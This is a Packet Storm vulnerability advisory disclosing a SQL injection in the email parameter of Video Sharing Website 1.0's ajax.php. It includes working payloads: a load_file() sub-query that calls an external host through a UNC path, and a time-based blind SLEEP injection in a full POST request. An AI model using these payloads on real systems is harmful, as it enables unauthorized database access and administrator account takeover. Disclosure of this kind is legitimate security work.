Video Sharing Website 1.0 SQL Injection

2021-12-20T00:00:00
ID PACKETSTORM:165368
Type packetstorm
Reporter nu11secur1ty
Modified 2021-12-20T00:00:00

Description

                                        
                                            `## Title: Video Sharing Website 1.0 SQL - Injection  
## Author: nu11secur1ty  
## Date: 12.18.2021  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html  
  
## Description:  
The `email` parameter from `ajax.php` app of Video Sharing Website 1.0  
appears to be vulnerable to SQL injection attacks. The payload  
'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'  
was submitted in the email parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed. The attacker can take administrator  
account controll on this system.  
Status: CRITICAL  
  
[+] Payload:  
  
```mysql  
---  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: email=jsmith@sample.com'+(select  
load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''  
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND  
'yreq'='yreq&password=jsmith123  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)  
  
## Proof and Exploit:  
[href](https://streamable.com/4x2rfk)  
  
`